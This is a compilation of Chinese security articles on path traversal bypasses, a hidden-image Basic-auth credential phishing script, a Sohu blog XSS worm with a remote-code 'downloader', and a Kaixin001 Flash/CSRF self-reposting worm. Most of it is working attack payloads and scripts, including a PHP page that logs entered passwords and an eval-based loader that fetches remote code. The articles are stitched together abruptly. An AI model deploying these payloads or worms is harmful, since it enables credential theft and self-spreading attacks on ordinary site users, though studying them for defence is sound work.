许多的Web应用程序一般会有对服务器的文件读取查看的功能，大多会用到提交的参数来指明文件名，形如：http://www.nuanyue.com/getfile=image.jgp

当服务器处理传送过来的image.jpg文件名后，Web应用程序即会自动添加完整路径，形如“d://site/images/image.jpg”，将读取的内容返回给访问者。

初看，在只是文件交互的一种简单的过程，但是由于文件名可以任意更改而服务器支持“~/”，“/..”等特殊符号的目录回溯，从而使攻击者越权访问或者覆盖敏感数据，如网站的配置文件、系统的核心文件，这样的缺陷被命名为路径遍历漏洞。在检查一些常规的Web应用程序时，也常常有发现，只是相对隐蔽而已。

发现路径遍历漏洞

路径遍历漏洞的发现，主要是对Web应用程序的文件读取交互的功能块，进行检测，面对这样的读取方式：

“http://www.nuanyue.com/test/downfile.jsp?filename=fan.pdf”

我们可以使用 “../”来作试探，比如提交Url：“getfile=/fan/fan/*53.pdf”，而系统在解析是“d://site/test/pdf/fan/fan/../../*53.pdf”，通过“../”跳转目录“/fan”，即“d://site/test/pdf/*53.pdf”，返回了读取文件的正常的页面。

路径遍历漏洞隐藏一般在文件读取或者展示图片功能块这样的通过参数提交上来的文件名，从这可以看出来过滤交互数据是完全有必要的。恶意攻击者当然后会利用对文件的读取权限进行跨越目录访问，比如访问一些受控制的文件，“../../../../../../../etc/passwd“或者”../../../../boot.ini“，当然现在部分网站都有类似Waf的防护设备，只要在数据中会有/etc /boot.ini等文件名出直接进行拦截。

遍历路径攻击变异

路径遍历漏洞是很常见的，在Web应用程序编写过程，会有意识的对传递过来的参数进行过滤或者直接删除，存在风险的过滤方式，一般可以采用如下方式进行突破：

以下是一些绕过的方法，当然在实际运行过程中，可以组合使用。

(1) 加密参数传递的数据；在Web应用程序对文件名进行加密之后再提交，比如：“downfile.jsp?filename= ZmFuLnBkZg- “，在参数filename用的是Base64加密，而攻击者要想绕过，只需简单的将文件名加密后再附加提交即可。所以说，采用一些有规律或者轻易能识别的加密方式，也是存在风险的。

(2)  编码绕过，尝试使用不同的编码转换进行过滤性的绕过，比如Url编码，通过对参数进行Url编码提交，“downfile.jsp?filename= %66%61%6E%2E%70%64%66“来绕过。

(3)  目录限定绕过；在有些Web应用程序是通过限定目录权限来分离的。当然这样的方法不值得可取的，攻击者可以通过某些特殊的符号“~“来绕过。形如这样的提交“downfile.jsp?filename=~/../boot”。能过这样一个符号，就可以直接跳转到硬盘目录下了。

(4)  绕过文件后缀过滤；一些Web应用程序在读取文件前，会对提交的文件后缀进行检测，攻击者可以在文件名后放一个空字节的编码，来绕过这样的文件类型的检查。例如：../../../../boot.ini%00.jpg，Web应用程序使用的Api会允许字符串中包含空字符，当实际获取文件名时，则由系统的Api会直接截短，而解析为“../../../../boot.ini”。在类Unix的系统中也可以使用Url编码的换行符，例如：../../../etc/passwd%0a.jpg如果文件系统在获取含有换行符的文件名，会截短为文件名。也可以尝试%20，例如: ../../../index.jsp%20

(5)  绕过来路验证。在一些Web应用程序中，会有对提交参数的来路进行判断的方法，而绕过的方法可以尝试通过在网站留言或者交互的地方提交Url再点击或者直接修改Http Referer即可，这主要是原因Http Referer是由客户端浏览器发送的，服务器是无法控制的，而将此变量当作一个值得信任源是错误的。

防范遍历路径漏洞

在防范遍历路径漏洞的方法中，最有效的是权限的控制，谨慎的处理向文件系统API传递过来的参数路径。主要是因为大多数的目录或者文件权限均没有得到合理的配置，而Web应用程序对文件的读取大多依赖于系统本身的API，在参数传递的过程，如果没有得严谨的控制，则会出现越权现象的出现。在这种情况下，Web应用程序可以采取以下防御方法，最好是组合使用。

(1)  数据净化，对网站用户提交过来的文件名进行硬编码或者统一编码，对文件后缀进行白名单控制，对包含了恶意的符号或者空字节进行拒绝。

(2)  Web应用程序可以使用chrooted环境访问包含被访问文件的目录，或者使用绝对路径+参数来控制访问目录，使其即使是越权或者跨越目录也是在指定的目录下。

总结

路径遍历漏洞允许恶意攻击者突破Web应用程序的安全控制，直接访问攻击者想要的敏感数据 ，包括配置文件、日志、源代码等，配合其它漏洞的综合利用，攻击者可以轻易的获取更高的权限，并且这样的漏洞在发掘上也是很容易的，只要对Web应用程序的读写功能块直接手工检测，通过返回的页面内容来判断，是很直观的，利用起来也相对简单。

在这充满诱惑的网络，恶意攻击者的攻击手法层出不穷。而其中颇具难度的社会工程攻击在取得用户的信任的手段方面，往往更倾向于伪装用户服务提供商，或者是在用户交互时，直接进行欺骗。比较典型的网络钓鱼攻击是将用户引诱到一个通过精心设计与用户信任非常相似的钓鱼网站，让用户在不易察觉的情况下提供用户的个人敏感信息。在2004年，国内也曾出现过假冒银行的网站，比如假冒中国工商银行的网站。而这一篇文章，将主要介绍HTML语言里的图片标签引用而诱引的验证漏洞和其伪装的过程。
在milw0rm.com网站，petros发布一篇题为《Image Authentication Injection Paper + PoC》的文章，里头提到通过创建一个php文件向客户端的浏览器发送401未经授权的状态而导致浏览器显示一个登录对话框（显示给用户好像是从目标网站）发起的一个授权认证对话框，而恶意攻击者会诱使用户输入帐户或者密码之类的敏感信息从而导致钓鱼式的攻击。其流程如下：

HTTP是一种基于请求与响应模式的、无状态的、应用层的协议，客户端向服务器发送一个请求，请求头包含请求的方法、URL、协议版本、以及包含请求修饰符、客户 信息和内容的类似于MIME的消息结构。服务器以一个状态行作为响应，相应的内容包括消息协议的版本，成功或者错误编码加上包含服务器信息、实体元信息以及可能实体内容。对整个过程进行抓包:
HTTP请求：

GET /iai.php HTTP/1.1 表示请求方法GET，请求的地址，和HTTP协议版本
Accept: */*           表示客户端可识别的内容类型列表，*/*表示所有类型
Accept-Language: zh-cn 表示客户端所能解盘的语言：简体中文
Accept-Encoding: gzip, deflate 表示客户端可以解盘的类型
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)              表示客户端浏览器型号
Host: www.test.cn 表示提交请求的页面
Connection: Keep-Alive      表示TCP连接保持打开

HTTP响应：

HTTP/1.1 401 Unauthorized  表示HTTP协议版本，应答码是401 即未经授权访问
Date: Sat, 25 Jul 2009 11:42:27 GMT  表示当前的GMT时间
Server: Apache/2.2.3 (CentOS)  表示服务器的操作类型
X-Powered-By: PHP/5.1.6        表示服务器的脚本版本
WWW-Authenticate: Basic realm="Text" 表示客户端在Authenticate头中提供的授权信息
Content-Length: 3  表示连接内容长度
Connection: close  表示TCP连接关闭
Content-Type: text/html 表示文档类型
负责响应的iai.php文件内容：
  header('WWW-Authenticate: Basic realm="Text"');
  header('HTTP/1.0 401 Unauthorized');
使用了PHP中的Header()函数，发送一个原始HTTP标头[Http Header]到客户端。

钓鱼式攻击的利用，从上面流程图里，可以知道大致步骤如下：
在网页里插入恶意代码
插入调用远程图片的代码，形如：

[img]http://B.com/iai.php[/img]
<img src="http://B.com/iai.php" alt="" width="0" height="0" />

最好是高度宽度都为0，免得在网页里显示空白,代码如下：

< !DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
 
<img src="http://www.B.com/iai.php" alt="" />
 
<img src="http://www.B.com/iai.php" alt="" />

编写iai.php脚本这个脚本的主要功能包括返回401应答和获取提交的敏感信息，并保存。代码如下：

< ?php
    global  $username,$passwd,$host;
      if (!isset($_SERVER['PHP_AUTH_USER']))
    {
     header('WWW-Authenticate: Basic realm="test"');
     header('HTTP/1.0 401 Unauthorized');
     exit;
     }
       $username=$_SERVER['PHP_AUTH_USER'];
       $passwd=$_SERVER['PHP_AUTH_PW'];
       $host = $_SERVER['HTTP_HOST'];
       $myFile = "log.txt";
       $fh = fopen($myFile, 'a') or die("can't open file");
       fwrite($fh, "网址:\t$host\t\t");
       fwrite($fh, "usname:\t$username\t");
       fwrite($fh, "passwd:\t$passwd\r\n");
       fclose($fh);
?>

当正常用户访问网站时，插在网页里的iai.php文件，即会强制弹出验证框，如图：

如果用户提交了帐户或者密码后，iai.php会在后台自动提交给远程的log.txt文件，产生内容如下：

通过加载脚本强制验证窗体的弹出，此社工在利用时，还是具有一定的局限性。在隐藏攻击意图时，有些不足，弹出的框，比较生硬，也可以语言措辞下进行修改，但是对一些安全意识缺失的网民来说，还是会有上当的可能。希望大家能当心，不要轻易输入敏感信息。

'';:!--"=&#{()} \/

结果

”;:!–”=&#{()} // (&后是amp,论坛过滤了)

过滤了”javascript”,”&”和”\”这两个转义字符串,因此HTML转码和CSS样式转码已无效,只好从属性和事件入手.

2.测试一个XSS常用属性和两个事件,貌似没有过滤字符.

expression
onerror
onload

3.下面开始尝试构造语句.如下:

<img style="Xss:expression(alert('xss'));" src="#" alt="" />
 
<img src="#" alt="" />
 
<img src="http://js.pp.sohu.com/ppp/blog/styles/images/welcome.jpg" alt="" />

构造完整标记,页面输出后又全部过滤.

4.”/”字符没有过滤因此可以构造/*xxxx*/注释符,expression属性可以配合注释符构造出语句:

<div style="xss:ex/**/pre/**/ssion(alert('xss'))"></div>

5.由于expression属性比较特殊想当于一个死循环的EVAL函数,同时style标记里不能出现”;”字符,也就是不能构造多条连接在一起的javascript,因此构造出如下语句:

<div style="xss:ex/**/pre/**/ssion(eval(xss));">
 
//设置一个COOKIE在10秒后失效,并在这条COOKIE语句中执行其他语句或函数.</div>

6.遗憾的是SOHU BLOG对于标记内不合适的内容都会过滤,因此我们无法eval标记内的某个变量,于是采用fromCharCode方法,将Unicode字符值专成字符串再用eval函数执行:

<div style="xss:ex/**/pre/**/ssion(eval(String.fromCharCode(97,108,101,114,116,40,39,120,115,115,39,41)))"></div>

7.感染流程考虑:

(1).BLOG页面的个人档案处是页面通用的,
(2)XSS内容写到个人档案处,所有浏览者都会触发XSS
(3)实现一段提交XSS内容到个人档案的代码.

8.个人档案处只能输入2048个字符,又采用了fromCharCode方法,因此出现XSS代码长度的限制,因此只能调用远程代码,于是写出了个XSS downloader.

主要代码:

function d(){
a=new ActiveXObject('Microsoft.XMLHTTP'); /*调用XMLHTTP控件
a.Open('get','http://s0n9.blog.sohu.com/31406970.html',false);/*发出一个GET提交请求
a.send();
b=a.responseText; /*将传回值赋给变量B
eval(unescape(b.substring(b.indexOf('--|')+3,b.indexOf('|--'))));
/*用indexOf计算 --|********|-- 的位置,用substring方法取出字符串,最后用unescape方法解码.
}d()
 
http://s0n9.blog.sohu.com/31406970.html页面代码:
alert%28%27xss%27%29%3B

/*利用escape将标点符号转码,由于responseText特性,某些字符会转换,如”&”字符会变成”&”(&后是amp,论坛过滤了)

PS:其他传染和详细的伪造提交的过程略去,各门户网站小心,过滤好XSS关键字,以防止XSS WROM爆发

漏洞分析：Flash在越来越多的网站得到广泛的应用，往往被用来播放视频，游戏或者是其他复杂的用户交互功能，但是在使用Flash的时候，大部分的网站处理的时候并没有想象中那么安全，譬如在开心网的发日记的地方使用Flash的方式如下：

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="454" height="384" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://www.80sec.com/x.swf" /><param name="wmode" value="transparent" /><embed type="application/x-shockwave-flash" width="454" height="384" src="http://www.80sec.com/x.swf" wmode="transparent"></embed></object>

开心网直接允许在页面引入其他域的Flash，同时为了安全性，在使用的时候用到了allowscriptaccess属性来做限制。整个代码使用语法分析的方式来做过滤，无法被绕过，但是这里漏掉了一个重要的属性allowNetworking，利用这个属性flash可以通过浏览器做网络访问。
同时开心网另外一个严重的问题就是CSRF问题，尽管其在重要的数据更改的地方都限制只能使用POST方式提交，但是所有的请求数据内容可以被预知，很容易就实现CSRF攻击。而开心网用户之间的交互非常之多，利用一些简单的功能就可以实现将某些内容引诱其他用户访问，CSRF的固有的攻击的被动性可以得到有效的弥补。
综合上面几点，我们就可以利用其中的漏洞主动的攻击开心网在线用户了。

技术实现：80sec之前提供了一款用于Flash渗透测试的工具Fly_Flash，具体地址为http://www.80sec.com /fly_flash-0-1-release.html，利用Fly_Flash我们可以很方便的实现一次渗透测试，譬如在配置文件里写上

3,http://www.80sec.com/action.php?80sec,,,user=data&pass=data

既可以使用浏览器当前的会话像www.kaixin001.com发起一个请求，请求的内容为后面的user=data&pass=data部分，并且整个请求不会受到浏览器的隐私策略的限制，可以同时使用持久Cookie和Session Cookie。

1 发布一个含有测试Flash的帖子，内容包括一些有吸引力的文字和隐藏在文字之间的Flash代码

<object classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000" width="454" height="384" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,40,0"><param name="src" value="http://www.80sec.com/fly_flash.swf?sec80=http://www.80sec.com/fly_flash.txt&amp;x.swf" /><param name="wmode" value="transparent" /><embed type="application/x-shockwave-flash" width="454" height="384" src="http://www.80sec.com/fly_flash.swf?sec80=http://www.80sec.com/fly_flash.txt&amp;x.swf" wmode="transparent"></embed></object>

2 http://www.80sec.com/fly_flash.txt内容是我们要构造的数据包请求，这里利用开心网的转贴功能实现内容在用户之间的传播

2,http://img.users.51.la/3182000.asp
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20569243&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20570931&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php?80sec,,,rtype=diary_773000_20567962&word=&do=succ&commenttyp=1&uid=&touids=&comment2src=1
3,http://www.kaixin001.com/friend/addverify.php?80sec,,,from=&touid=773000&content=hi+%0D%0A%3A%29&rcode=&code=&usercode=&email=&bidirection=

其中2,http://img.users.51.la/3182000.asp用作访问的统计，后面的就是自己构造的对http: //www.kaixin001.com/!repaste/!repaste_tofriend_dialog.php发起的POST请求，后面的数据就是上面我们构造好的邪恶的日记。而一旦用户看了这篇日记之后就会自动进行转贴，一旦其他好友查看之后就会再次自动转贴，蠕虫实现了借助转贴功能的传播。

3 恩，结束，就这么简单。

漏洞修复：我们将在后续对Flash的安全使用问题做深入探讨，这里建议开心网从根本上对CSRF问题做防范，具体方式可以参考80sec以前的文章。